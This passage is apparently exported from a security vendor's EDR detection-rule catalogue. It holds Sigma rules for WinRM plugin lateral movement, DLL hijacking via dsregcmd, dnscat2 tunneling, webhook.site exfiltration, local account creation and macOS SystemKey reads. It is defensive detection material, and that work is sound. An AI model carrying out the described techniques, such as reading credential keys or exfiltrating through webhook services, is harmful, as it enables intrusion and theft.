"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624409Z",
"creation_date": "2026-03-23T11:45:34.624411Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624415Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://falconforce.nl/exploring-winrm-plugins-for-lateral-movement/",
"https://github.com/FalconForceTeam/bof-winrm-plugin-jump",
"https://attack.mitre.org/techniques/T1547/",
"https://attack.mitre.org/techniques/T1021/006/"
],
"name": "t1021_006_winrm_plugin.yml",
"content": "title: WinRM Plugins Lateral Movement\nid: 7420063d-e8f8-4eb6-bcd4-1fb8c0d6f69d\ndescription: |\n Detects a suspicious WinRM plugin remote creation.\n WinRM offers an API to accept third-party plugins. These plugins consist of DLLs that need to be located in the System32 folder.\n They are stored in the registry under the key \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN\\Plugin\".\n Threat actors can remotely create a WinRM plugin pointing to a malicious DLL using the Remote Registry service or COM programming.\n Restarting the WinRM service will make wsmprovhost.exe (the process spawned by the WinRM service) load the DLL.\n It is recommended to investigate the IP address from where the registry value was modified and the libraries loaded by wsmprovhost.exe for suspicious activities.\nreferences:\n - https://falconforce.nl/exploring-winrm-plugins-for-lateral-movement/\n - https://github.com/FalconForceTeam/bof-winrm-plugin-jump\n - https://attack.mitre.org/techniques/T1547/\n - https://attack.mitre.org/techniques/T1021/006/\ndate: 2025/01/21\nmodified: 2025/12/02\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.006\n - attack.persistence\n - attack.t1547\n - classification.Windows.Source.Registry\n - classification.Windows.HackTool.WinRMPluginJump\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_registry_value:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN\\Plugin\\\\*\\ConfigXML'\n\n selection_remote:\n - SessionLogonType: 3\n - ProcessSessionLogonType: 3 # Network Session\n\n exclusion_legit_plugins:\n Details|contains:\n - 'Filename=\"%windir%\\system32\\pwrshplugin.dll\"'\n - 'Filename=\"C:\\WINDOWS\\system32\\pwrshplugin.dll\"'\n - 'Filename=\"%windir%\\system32\\PowerShell\\7.?.?\\pwrshplugin.dll\"'\n\n condition: all of 
selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7420063d-e8f8-4eb6-bcd4-1fb8c0d6f69d",
"rule_name": "WinRM Plugins Lateral Movement",
"rule_description": "Detects a suspicious WinRM plugin remote creation.\nWinRM offers an API to accept third-party plugins. These plugins consist of DLLs that need to be located in the System32 folder.\nThey are stored in the registry under the key \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN\\Plugin\".\nThreat actors can remotely create a WinRM plugin pointing to a malicious DLL using the Remote Registry service or COM programming.\nRestarting the WinRM service will make wsmprovhost.exe (the process spawned by the WinRM service) load the DLL.\nIt is recommended to investigate the IP address from where the registry value was modified and the libraries loaded by wsmprovhost.exe for suspicious activities.\n",
"rule_creation_date": "2025-01-21",
"rule_modified_date": "2025-12-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1021.006",
"attack.t1547"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "74259026-c475-45cc-bac2-fb2a5768e419",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079894Z",
"creation_date": "2026-03-23T11:45:34.079896Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079900Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.reliaquest.com/blog/double-extortion-attack-analysis/",
"https://www.iobit.com/fr/iobit-unlocker.php",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_execution_of_iobitunlocker.yml",
"content": "title: Execution of IObit Unlocker\nid: 74259026-c475-45cc-bac2-fb2a5768e419\ndescription: |\n Detects the execution of IObit Unlocker.\n IObit Unlocker is a free utility tool that allows the removal of files and folders that are currently locked by the system because they are in use by another program or resource.\n Adversaries may use this tool to modify and/or disable security tools and avoid possible detection of their malicious actions.\n It is recommended to investigate the parent process for suspicious activities as well as to verify the integrity of the EDR and other security solutions running on the host, as they may have been tampered with by the tool.\nreferences:\n - https://www.reliaquest.com/blog/double-extortion-attack-analysis/\n - https://www.iobit.com/fr/iobit-unlocker.php\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/09/19\nmodified: 2025/01/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.IOBitUnlocker\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\IObitUnlocker.exe'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "74259026-c475-45cc-bac2-fb2a5768e419",
"rule_name": "Execution of IObit Unlocker",
"rule_description": "Detects the execution of IObit Unlocker.\nIObit Unlocker is a free utility tool that allows the removal of files and folders that are currently locked by the system because they are in use by another program or resource.\nAdversaries may use this tool to modify and/or disable security tools and avoid possible detection of their malicious actions.\nIt is recommended to investigate the parent process for suspicious activities as well as to verify the integrity of the EDR and other security solutions running on the host, as they may have been tampered with by the tool.\n",
"rule_creation_date": "2023-09-19",
"rule_modified_date": "2025-01-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "742a1f89-039d-459e-b772-50a881353a76",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623137Z",
"creation_date": "2026-03-23T11:45:34.623139Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623143Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1136/001/"
],
"name": "t1136_001_powershell_create_user.yml",
"content": "title: Local User Created Interactively via PowerShell\nid: 742a1f89-039d-459e-b772-50a881353a76\ndescription: |\n Detects the usage of PowerShell in an interactive session to create a new local user.\n Adversaries may create a local account to maintain access to victim systems.\n It is recommended to analyze other commands executed within the PowerShell session using the telemetry to determine whether this actions is legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1136/001/\ndate: 2022/11/07\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1136.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_command:\n PowershellCommand|contains: 'New-LocalUser '\n\n # To avoid FP on commandlets that don't necessarly execute the command\n selection_args:\n PowershellCommand|contains:\n - ' -N' # For -Name or -NoPassword\n - ' -P' # For -Password\n\n filter_script:\n PowershellScriptPath|contains: '?'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_alticap:\n ProcessImage: '?:\\ProgramData\\Alticap\\temp\\temp-affairmazdaacuitynrc.exe'\n\n exclusion_cc3:\n ProcessOriginalFileName: 'ScanCC3'\n ProcessCompany: 'RISO France'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "742a1f89-039d-459e-b772-50a881353a76",
"rule_name": "Local User Created Interactively via PowerShell",
"rule_description": "Detects the usage of PowerShell in an interactive session to create a new local user.\nAdversaries may create a local account to maintain access to victim systems.\nIt is recommended to analyze the other commands executed within the PowerShell session using the telemetry to determine whether this action is legitimate.\n",
"rule_creation_date": "2022-11-07",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1136.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "74422f0a-4d43-4762-b069-3d5862f1ae35",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079826Z",
"creation_date": "2026-03-23T11:45:34.079828Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079832Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_dialer.yml",
"content": "title: Dialer.exe Sacrificial Process Spawned\nid: 74422f0a-4d43-4762-b069-3d5862f1ae35\ndescription: |\n Detects the suspicious execution of the legitimate Windows binary dialer.exe, spawned without arguments. This can mean that the binary is being used as sacrificial process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used by Rhadamanthys, a malicious information stealer which is being distributed mostly via malicious Google advertisements.\n It is recommended to investigate the parent process performing this action and the destination IP address of the dialer.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/03/27\nmodified: 2025/10/02\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SacrificialProcess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Windows\\System32\\dialer.exe'\n\n filter_parent:\n ParentImage:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Windows\\System32\\sihost.exe'\n\n # https://houseonthehill.com/\n exclusion_supdskcs:\n ProcessParentOriginalFileName: 'SupDskCs.exe'\n ProcessParentDescription: 'SupportDesk Desktop'\n\n exclusion_logosw:\n ParentImage:\n - '?:\\Program Files (x86)\\LOGOSw\\agendum.exe'\n - '?:\\Program Files (x86)\\LOGOSw\\LOGOS_w.exe'\n\n # https://www.prospective-fr.com/\n exclusion_prospective:\n ProcessParentOriginalFileName: 'Prospective.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Matisoft Édition (Martin Baptiste)'\n\n exclusion_procreances:\n ProcessParentImage|endswith: 
'\\Procreances.exe'\n ProcessParentProduct: 'Procreances'\n ProcessParentDescription: 'Gestion Cabinet Recouvrement'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "74422f0a-4d43-4762-b069-3d5862f1ae35",
"rule_name": "Dialer.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate Windows binary dialer.exe, spawned without arguments. This can mean that the binary is being used as a sacrificial process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used by Rhadamanthys, a malicious information stealer which is distributed mostly via malicious Google advertisements.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the dialer.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-03-27",
"rule_modified_date": "2025-10-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "747036bf-6ed1-402f-8ff0-a86d4a7caacb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600480Z",
"creation_date": "2026-03-23T11:45:34.600484Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600491Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dsregcmd.yml",
"content": "title: DLL Hijacking via dsregcmd.exe\nid: 747036bf-6ed1-402f-8ff0-a86d4a7caacb\ndescription: |\n Detects potential Windows DLL Hijacking via dsregcmd.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dsregcmd.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dsreg.dll'\n - '\\logoncli.dll'\n - '\\ncrypt.dll'\n - '\\netutils.dll'\n - '\\PROPSYS.dll'\n - '\\secur32.dll'\n - '\\SSPICLI.DLL'\n - '\\USERENV.dll'\n - '\\WINHTTP.dll'\n - '\\WININET.dll'\n - '\\wkscli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection 
and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "747036bf-6ed1-402f-8ff0-a86d4a7caacb",
"rule_name": "DLL Hijacking via dsregcmd.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dsregcmd.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "74c8a0a8-cc75-430e-be46-60cb5efaebc0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603013Z",
"creation_date": "2026-03-23T11:45:34.603016Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603024Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/",
"https://github.com/iagox86/dnscat2",
"https://attack.mitre.org/techniques/T1572/"
],
"name": "t1572_dnscat_tunneling_request.yml",
"content": "title: DNS Name Associated with dnscat2 Resolved\nid: 74c8a0a8-cc75-430e-be46-60cb5efaebc0\ndescription: |\n Detects a DNS query starting with \"dnscat.\", which is associated with default dnscat2 binaries.\n Dnscat2 is a DNS tunneling tool. Adversaries may use the DNS protocol to communicate with their C&C as a way to circumvent network protections.\n It is recommended to check the content of the request and to look for suspicious behavior by the process making the request.\nreferences:\n - https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/\n - https://github.com/iagox86/dnscat2\n - https://attack.mitre.org/techniques/T1572/\ndate: 2025/09/24\nmodified: 2025/09/30\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1572\n - attack.t1071.004\n - attack.t1568.003\n - attack.exfiltration\n - attack.t1048.003\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.Tunneling\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n Image|contains: '?'\n QueryName|startswith: 'dnscat.'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "74c8a0a8-cc75-430e-be46-60cb5efaebc0",
"rule_name": "DNS Name Associated with dnscat2 Resolved",
"rule_description": "Detects a DNS query starting with \"dnscat.\", which is associated with default dnscat2 binaries.\nDnscat2 is a DNS tunneling tool. Adversaries may use the DNS protocol to communicate with their C&C as a way to circumvent network protections.\nIt is recommended to check the content of the request and to look for suspicious behavior by the process making the request.\n",
"rule_creation_date": "2025-09-24",
"rule_modified_date": "2025-09-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048.003",
"attack.t1071.004",
"attack.t1568.003",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "74ca3e8c-023b-412c-b594-c231e695e097",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077320Z",
"creation_date": "2026-03-23T11:45:34.077323Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077330Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/@simone.kraus/critical-engergy-infrastructure-facility-in-ukraine-attack-b15638f6a402",
"https://www.zscaler.com/blogs/security-research/steal-it-campaign",
"https://attack.mitre.org/techniques/T1567/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1567_url_request_webhook.yml",
"content": "title: URL Request to Webhook Service\nid: 74ca3e8c-023b-412c-b594-c231e695e097\ndescription: |\n Detects URL requests to a webhook service such as Webhook.site.\n These services allow for automatic logging of the requests they receive and can be configured to reply custom responses.\n Attackers use such services to exfiltrate stolen data stealthfully, or to host and deliver malicious payloads.\n It is recommended to investigate the process performing this action to determine its legitimacy.\nreferences:\n - https://medium.com/@simone.kraus/critical-engergy-infrastructure-facility-in-ukraine-attack-b15638f6a402\n - https://www.zscaler.com/blogs/security-research/steal-it-campaign\n - https://attack.mitre.org/techniques/T1567/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2023/09/07\nmodified: 2025/01/14\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1567\n - attack.command_and_control\n - attack.t1105\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n RequestUrlHost: 'webhook.site'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "74ca3e8c-023b-412c-b594-c231e695e097",
"rule_name": "URL Request to Webhook Service",
"rule_description": "Detects URL requests to a webhook service such as Webhook.site.\nThese services automatically log the requests they receive and can be configured to reply with custom responses.\nAttackers use such services to exfiltrate stolen data stealthily, or to host and deliver malicious payloads.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\n",
"rule_creation_date": "2023-09-07",
"rule_modified_date": "2025-01-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1567"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "74d81cc1-fab9-4018-9433-2fedef3fe99a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617581Z",
"creation_date": "2026-03-23T11:45:34.617583Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617587Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1552/003/"
],
"name": "t1564_001_read_systemkey.yml",
"content": "title: Suspicious Access to SystemKey\nid: 74d81cc1-fab9-4018-9433-2fedef3fe99a\ndescription: |\n Detects a suspicious access to the SystemKey file.\n Adversaries may read the SystemKey in order to unlock the system Keychain file.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1552/003/\ndate: 2024/07/22\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.003\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n product: macos\n category: filesystem_event\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_path:\n Path: '/private/var/db/SystemKey'\n Kind: 'read'\n ProcessImage|contains: '/'\n\n filter_sedcurityd:\n ProcessImage: '/usr/sbin/securityd'\n\n exclusion_birdagent:\n ProcessImage|endswith: '/bird_agent_stable'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: '_bird_python_dbg'\n\n exclusion_broadcom:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.broadcom.mes.systemextension'\n\n exclusion_bitdefender:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.bitdefender.bddaemon'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "74d81cc1-fab9-4018-9433-2fedef3fe99a",
"rule_name": "Suspicious Access to SystemKey",
"rule_description": "Detects suspicious access to the SystemKey file.\nAdversaries may read the SystemKey in order to unlock the system Keychain file.\nIt is recommended to verify whether the process performing the read operation has a legitimate reason to do so.\n",
"rule_creation_date": "2024-07-22",
"rule_modified_date": "2025-03-07",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1552.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "74d9e50a-fabb-42bb-90dc-e3077f67a6da",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
